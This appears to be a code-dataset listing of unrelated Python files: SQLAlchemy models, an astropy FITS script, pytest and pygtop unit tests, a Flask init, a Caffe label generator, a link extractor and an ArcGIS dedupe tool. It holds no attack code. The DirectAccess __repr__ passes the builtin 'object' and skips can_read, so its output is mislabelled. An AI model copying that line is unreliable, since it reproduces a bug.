__tablename__ = 'derivations'
__mapper_args__ = {
'polymorphic_identity': 'derivation'
}
id = db.Column(db.Integer, db.ForeignKey('processes.id'), primary_key=True)
class Bookmark(db.Model):
__tablename__ = 'bookmarks'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
user = db.relationship('User', foreign_keys=[user_id])
dataset = db.relationship('Dataset', foreign_keys=[dataset_id])
def __init__(self, user, dataset):
self.user = user
self.dataset = dataset
def __repr__(self):
return '<Bookmark(user={}, dataset={})>'.format(self.user, self.dataset)
def to_dict(self):
return dict(user=self.user.name, collection=self.dataset.collection.name, dataset=self.dataset.name)
class Review(db.Model):
__tablename__ = 'reviews'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
rating = db.Column(db.Integer)
comment = db.Column(db.String)
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
user = db.relationship('User', foreign_keys=[user_id])
dataset = db.relationship('Dataset', foreign_keys=[dataset_id])
def __init__(self, user, dataset, rating, comment):
self.user = user
self.dataset = dataset
self.rating = rating
self.comment = comment
def __repr__(self):
return '<Review(user={}, dataset={}, rating={}, comment={})>'.\
format(self.user, self.dataset, self.rating, self.comment)
class Connection(db.Model):
__tablename__ = 'connections'
id = db.Column(db.Integer, primary_key=True)
from_id = db.Column(db.Integer, db.ForeignKey('users.id'))
to_id = db.Column(db.Integer, db.ForeignKey('users.id'))
degree = db.Column(db.Integer)
from_user = db.relationship('User', foreign_keys=[from_id])
to_user = db.relationship('User', foreign_keys=[to_id])
def __init__(self, from_id=None, to_id=None):
self.from_id = from_id
self.to_id = to_id
self.degree = 1
def __repr__(self):
return '<Connection(from={}, to={}, degree={})>'.\
format(self.from_user, self.to_user, self.degree)
class AccessRequest(db.Model):
__tablename__ = 'access_requests'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))
dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
can_read = db.Column(db.Boolean, default=False)
can_interact = db.Column(db.Boolean, default=False)
can_fork = db.Column(db.Boolean, default=False)
message = db.Column(db.String)
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
user = db.relationship('User')
usergroup = db.relationship('Group')
dataset = db.relationship('Dataset')
def __repr__(self):
return '<AccessRequest(user={}, dataset={}, read={}, interact={}, fork={}>'.\
format(self.user, self.dataset, self.can_read, self.can_interact, self.can_fork)
class DirectAccess(db.Model):
__tablename__ = 'direct_access'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))
dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
can_read = db.Column(db.Boolean, default=False)
can_interact = db.Column(db.Boolean, default=False)
can_fork = db.Column(db.Boolean, default=False)
user = db.relationship('User')
usergroup = db.relationship('Group')
dataset = db.relationship('Dataset')
def __repr__(self):
return '<DirectAccess(user={}, dataset={}, read={}, interact={}, fork={}>'.\
format(self.user, object, self.dataset, self.can_interact, self.can_fork)
|
from astropy.io import fits
import numpy as np
import matplotlib.pyplot as plt
import sys
evtorg=sys.argv[1]
org=fits.open(evtorg)
obsid=evtorg.split('_')[2]
orbitno=evtorg.split('_')[3].split('c')[0]
noisy_detx=int(sys.argv[2])
noisy_dety=int(sys.argv[3])
fig=plt.figure()
for qid in range(1, 5):
pixdata=org[qid].data['Time'][np.where((org[qid].data['DETX']==noisy_detx) & (org[qid].data['DETY']==noisy_dety))]
print pixdata
oh,b1=np.histogram(pixdata,bins=(int)(pixdata[-1]-pixdata[0]))
plt.plot(b1[:-1],oh)
plt.show()
#fig.savefig(obsid+"_"+orbitno+"_Q"+str(qid)+".png")
org.close()
|
import time
import math
import pytest
import pleasehold
def test_duration():
duration = 5
begin = time.time()
with pleasehold.hold():
time.sleep(duration)
total = time.time() - begin
assert math.isclose(total, duration, rel_tol=0.01)
|
from flask import Flask, render_template
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_mysqldb import MySQL
#from flask_migrate import Migrate
from flask_babel import Babel, lazy_gettext as _l
import json
import pandas as pd
import numpy as np
import os, base64, re, logging
AppServer = Flask(__name__)
AppServer.config.from_object(Config)
db = SQLAlchemy(AppServer)
babel = Babel()
babel.init_app(AppServer)
#migrate = Migrate(AppServer, db)
import routes
|
# This file is used for generating label files in experiments with Caffe.
import os
images=[]
def maketrainList(imageFile, pathFile):
fobj = open(pathFile, 'a')
for root,dirs,files in os.walk(imageFile):
files.sort()
for f in files:
images.append(f)
num = len(images)
for i in range(num):
# label = images[i].split('_')[1]
base = os.path.basename(images[i])
base1 = os.path.splitext(base)[0]
label = base1.split('_')[1]
print label
# print files
fobj.write(images[i] + ' ' + label+'\n')
print(images[i] + ' ' + label + ' writes to the file successfully ')
fobj.close()
maketrainList('bvlc_googlenet/ma_aug/testingData40', 'data/grey_scale_dataset/testLabel_40.txt')
#maketrainList('bvlc_googlenet/ma_aug/trainingData60', 'data/grey_scale_dataset/trainLabel_60.txt')
|
from unittest import TestCase
import unittest.mock
from unittest.mock import patch
from pygtop.interactions import Interaction, get_all_interactions
from pygtop.ligands import Ligand
from pygtop.targets import Target
import pygtop.exceptions as exceptions
import xml.etree.ElementTree as ElementTree
class InteractionTest(TestCase):
def setUp(self):
self.interaction_json = {
"interactionId": 79397,
"targetId": 1,
"ligandAsTargetId": 0,
"targetSpecies": "Human",
"primaryTarget": False,
"targetBindingSite": "",
"ligandId": 7191,
"ligandContext": "",
"endogenous": False,
"type": "Agonist",
"action": "Agonist",
"actionComment": "",
"selectivity": "None",
"concentrationRange": "-",
"affinity": "7.2",
"affinityType": "pKi",
"originalAffinity": "6x10<sup>-8</sup>",
"originalAffinityType": "Ki",
"originalAffinityRelation": "",
"assayDescription": "",
"assayConditions": "",
"useDependent": False,
"voltageDependent": False,
"voltage": "-",
"physiologicalVoltage": False,
"conciseView": False,
"dataPoints": [],
"refs": []
}
self.ligand_json = {
"ligandId": 1,
"name": "flesinoxan",
"abbreviation": "flexo",
"inn": "flesinoxan",
"type": "Synthetic organic",
"species": None,
"radioactive": False,
"labelled": True,
"approved": True,
"withdrawn": False,
"approvalSource": "FDA (1997)",
"subunitIds": [2, 3],
"complexIds": [5],
"prodrugIds": [7],
"activeDrugIds": [9, 10]
}
self.target_json = {
"targetId": 1,
"name": "5-HT<sub>1A</sub> receptor",
"abbreviation": "5-HT",
"systematicName": None,
"type": "GPCR",
"familyIds": [1],
"subunitIds": [2, 3],
"complexIds": [4]
}
self.pdb_json = [
{
"targetId" : 2,
"ligandId" : 121,
"endogenous" : False,
"pdbCode" : "4IAQ",
"description" : "Crystal structure of the chimeric protein of 5-HT1B-BRIL in complex with dihydroergotamine",
"resolution" : 2.8,
"species" : "Human",
"refs" : []
}, {
"targetId" : 2,
"ligandId" : 149,
"endogenous" : False,
"pdbCode" : "4IAR",
"description" : "Crystal structure of the chimeric protein of 5-HT1B-BRIL in complex with ergotamine",
"resolution" : 2.7,
"species" : "Human",
"refs" : []
}, {
"targetId" : 2,
"ligandId" : 149,
"endogenous" : False,
"pdbCode" : "4xxx",
"description" : "Crystal structure of the chimeric protein of 5-HT1B-BRIL in complex with ergotamine",
"resolution" : 2.7,
"species" : "Rat",
"refs" : []
}
]
class InteractionRetrievalTests(InteractionTest):
@patch("pygtop.gtop.get_json_from_gtop")
def test_can_get_all_interactions(self, mock_json_retriever):
mock_json_retriever.return_value = [self.interaction_json, self.interaction_json]
interactions = get_all_interactions()
self.assertIsInstance(interactions, list)
self.assertEqual(len(interactions), 2)
self.assertIsInstance(interactions[0], Interaction)
self.assertIsInstance(interactions[1], Interaction)
class InteractionCreationTests(InteractionTest):
def test_can_create_interaction(self):
interaction = Interaction(self.interaction_json)
self.assertEqual(interaction.json_data, self.interaction_json)
self.assertEqual(interaction._interaction_id, 79397)
self.assertEqual(interaction._ligand_id, 7191)
self.assertEqual(interaction._target_id, 1)
self.assertEqual(interaction._species, "Human")
self.assertEqual(interaction._primary_target, False)
self.assertEqual(interaction._endogenous, False)
self.assertEqual(interaction._interaction_type, "Agonist")
self.assertEqual(interaction._action, "Agonist")
self.assertEqual(interaction._affinity_low, 7.2)
self.assertEqual(interaction._affinity_high, 7.2)
self.assertEqual(interaction._affinity_type, "pKi")
def test_can_process_affinity_range(self):
self.interaction_json["affinity"] = "9.4 – 10.3"
interaction = Interaction(self.interaction_json)
self.assertEqual(interaction._affinity_low, 9.4)
self.assertEqual(interaction._affinity_high, 10.3)
def test_can_process_affinity_range_with_median(self):
self.interaction_json["affinity"] = "7.7 – 9.0 (median: 8.6)"
interaction = Interaction(self.interaction_json)
self.assertEqual(interaction._affinity_low, 7.7)
self.assertEqual(interaction._affinity_high, 9.0)
def test_can_process_dash_affinity(self):
self.interaction_json["affinity"] = "-"
interaction = Interaction(self.interaction_json)
self.assertEqual(interaction._affinity_low, None)
self.assertEqual(interaction._affinity_high, None)
def test_interaction_repr(self):
interaction = Interaction(self.interaction_json)
self.assertEqual(str(interaction), "<Interaction (7191 --> Human 1)>")
class InteractionPropertyTests(InteractionTest):
def test_basic_property_methods(self):
interaction = Interaction(self.interaction_json)
self.assertIs(interaction._interaction_id, interaction.interaction_id())
self.assertIs(interaction._ligand_id, interaction.ligand_id())
self.assertIs(interaction._target_id, interaction.target_id())
self.assertIs(interaction._species, interaction.species())
self.assertIs(interaction._primary_target, interaction.primary_target())
self.assertIs(interaction._endogenous, interaction.endogenous())
self.assertIs(interaction._interaction_type, interaction.interaction_type())
self.assertIs(interaction._action, interaction.action())
self.assertIs(interaction._affinity_low, interaction.affinity_low())
self.assertIs(interaction._affinity_high, interaction.affinity_high())
self.assertIs(interaction._affinity_type, interaction.affinity_type())
@patch("pygtop.gtop.get_json_from_gtop")
def test_can_get_ligand(self, mock_json_retriever):
mock_json_retriever.return_value = self.ligand_json
interaction = Interaction(self.interaction_json)
ligand = interaction.ligand()
self.assertIsInstance(ligand, Ligand)
self.assertEqual(ligand.ligand_id(), self.ligand_json["ligandId"])
@patch("pygtop.gtop.get_json_from_gtop")
def test_ligand_when_no_json(self, mock_json_retriever):
mock_json_retriever.return_value = None
interaction = Interaction(self.interaction_json)
self.assertEqual(interaction.ligand(), None)
@patch("pygtop.gtop.get_json_from_gtop")
def test_can_get_target(self, mock_json_retriever):
mock_json_retriever.return_value = self.target_json
interaction = Interaction(self.interaction_json)
target = interaction.target()
self.assertIsInstance(target, Target)
self.assertEqual(target.target_id(), self.target_json["targetId"])
@patch("pygtop.gtop.get_json_from_gtop")
def test_target_when_no_json(self, mock_json_retriever):
mock_json_retriever.return_value = None
interaction = Interaction(self.interaction_json)
self.assertEqual(interaction.target(), None)
@patch("pygtop.gtop.get_json_from_gtop")
def test_can_get_gtop_pdbs(self, mock_json_retriever):
mock_json_retriever.return_value = self.pdb_json
self.interaction_json["ligandId"] = 149
interaction = Interaction(self.interaction_json)
pdbs = interaction.gtop_pdbs()
self.assertEqual(pdbs, ["4IAR"])
@patch("pygtop.gtop.get_json_from_gtop")
def test_gtop_pdbs_when_no_json(self, mock_json_retriever):
mock_json_retriever.return_value = None
interaction = Interaction(self.interaction_json)
self.assertEqual(interaction.gtop_pdbs(), [])
@patch("pygtop.gtop.get_json_from_gtop")
@patch("pygtop.pdb.query_rcsb")
@patch("pygtop.pdb.query_rcsb_advanced")
def test_can_get_all_external_pdbs(self, mock_xml_retriever, mock_simple_retriever, mock_json_retriever):
mock_simple_retriever.return_value = ElementTree.fromstring('''<?xml version='1.0' standalone='no' ?>
<smilesQueryResult smiles="NC(=O)C1=CC=CC=C1" search_type="4">
<ligandInfo>
<ligand structureId="2XG3" chemicalID="UNU" type="non-polymer" molecularWeight="121.137">
<chemicalName>BENZAMIDE</chemicalName>
<formula>C7 H7 N O</formula>
<InChIKey>KXDAEFPNCMNJSK-UHFFFAOYSA-N</InChIKey>
<InChI>InChI=1S/C7H7NO/c8-7(9)6-4-2-1-3-5-6/h1-5H,(H2,8,9)</InChI>
<smiles>c1ccc(cc1)C(=O)N</smiles>
</ligand>
<ligand structureId="3A1I" chemicalID="UNU" type="non-polymer" molecularWeight="121.137">
<chemicalName>BENZAMIDE</chemicalName>
<formula>C7 H7 N O</formula>
<InChIKey>KXDAEFPNCMNJSK-UHFFFAOYSA-N</InChIKey>
<InChI>InChI=1S/C7H7NO/c8-7(9)6-4-2-1-3-5-6/h1-5H,(H2,8,9)</InChI>
<smiles>c1ccc(cc1)C(=O)N</smiles>
</ligand>
</ligandInfo>
</smilesQueryResult>''')
mock_xml_retriever.side_effect = [["1xxx", "3A1I"], ["4IAR"], ["2xxx"], ["4IAR", "3xxx"]]
mock_json_retriever.side_effect = [
self.ligand_json, # Create ligand
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has smiles
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use smiles
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has inchi
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use inchi
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has peptide code
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use peptide code
self.target_json, # Make target
[{"accession": "10576", "database": "UniProtKB", "species": "Human", "url":"http"}]
]
interaction = Interaction(self.interaction_json)
pdbs = interaction.all_external_pdbs()
self.assertEqual(pdbs, ["4IAR"])
@patch("pygtop.gtop.get_json_from_gtop")
@patch("pygtop.pdb.query_rcsb")
@patch("pygtop.pdb.query_rcsb_advanced")
def test_can_get_all_pdbs(self, mock_xml_retriever, mock_simple_retriever, mock_json_retriever):
mock_simple_retriever.return_value = ElementTree.fromstring('''<?xml version='1.0' standalone='no' ?>
<smilesQueryResult smiles="NC(=O)C1=CC=CC=C1" search_type="4">
<ligandInfo>
<ligand structureId="2XG3" chemicalID="UNU" type="non-polymer" molecularWeight="121.137">
<chemicalName>BENZAMIDE</chemicalName>
<formula>C7 H7 N O</formula>
<InChIKey>KXDAEFPNCMNJSK-UHFFFAOYSA-N</InChIKey>
<InChI>InChI=1S/C7H7NO/c8-7(9)6-4-2-1-3-5-6/h1-5H,(H2,8,9)</InChI>
<smiles>c1ccc(cc1)C(=O)N</smiles>
</ligand>
<ligand structureId="3A1I" chemicalID="UNU" type="non-polymer" molecularWeight="121.137">
<chemicalName>BENZAMIDE</chemicalName>
<formula>C7 H7 N O</formula>
<InChIKey>KXDAEFPNCMNJSK-UHFFFAOYSA-N</InChIKey>
<InChI>InChI=1S/C7H7NO/c8-7(9)6-4-2-1-3-5-6/h1-5H,(H2,8,9)</InChI>
<smiles>c1ccc(cc1)C(=O)N</smiles>
</ligand>
</ligandInfo>
</smilesQueryResult>''')
mock_xml_retriever.side_effect = [["1xxx", "3A1I"], ["4IAR"], ["2xxx"], ["3A1I", "3xxx"]]
mock_json_retriever.side_effect = [
self.ligand_json, # Create ligand
[self.interaction_json],
self.pdb_json,
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has smiles
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use smiles
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has inchi
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use inchi
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has peptide code
{"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use peptide code
self.target_json, # Make target
self.pdb_json,
[{"accession": "10576", "database": "UniProtKB", "species": "Human", "url":"http"}]
]
interaction = Interaction(self.interaction_json)
pdbs = interaction.all_pdbs()
self.assertEqual(len(pdbs), 2)
for code in ["3A1I", "4IAR"]:
self.assertIn(code, pdbs)
|
#!/usr/bin/python -O
import sys
from codecs import open
def extract(fname):
print(fname)
try: f = open(fname)
except:
print('Unable to open ' + fname)
return
for l in f:
if not l: continue
for x in l.split('href=')[1:]:
if x[0] == '"': x = x[1:].split('"', 1)[0]
else: x = x.split()[0]
print(x)
f.close()
def main(argv=None):
for fname in sys.argv[1:]:
extract(fname)
if __name__ == "__main__": main()
|
## Author: Mitch Holley
## Date: 08/30/2016
## Version: 2.7.8
##
## This script is meant to be imported into an ArcGIS script. The purpose of the tool is to delete duplicate
## records in a specific field. A checkbox is included in the script to check for duplicate geometries.
## Both a specific field AND the duplicate geometry checkbox should not be selected at one time. This tool was
## built as a replacement for the 'Delete Identical (Data Management)' tool found in the ArcGIS Advanced License package.
##EDITS:
##9/12/2016 - After some testing, using sets was found to be much faster than lists. All old lists were convereted to sets().
import arcpy
#Get feature from user
feature = arcpy.GetParameterAsText(0)
#Get field from user
field = arcpy.GetParameterAsText(1)
#Boolean used for check box
ischecked = arcpy.GetParameterAsText(2)
#Lists
field_list = set()
shapes = set()
#Count for messages
count = 0
if str(ischecked) == 'true':
with arcpy.da.UpdateCursor(feature, ['SHAPE@XY']) as cursor:
for row in cursor:
if row[0] not in shapes:
shapes.add(row[0])
else:
count+=1
cursor.deleteRow()
arcpy.AddMessage('\n'+str(count) + ' duplicate geometries removed.\n')
else:
with arcpy.da.UpdateCursor(feature, [field]) as cursor:
for row in cursor:
if row[0] not in field_list:
field_list.add(row[0])
else:
count+=1
cursor.deleteRow()
arcpy.AddMessage('\n'+str(count) + ' duplicates removed from the ' + str(field) + ' field.\n')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.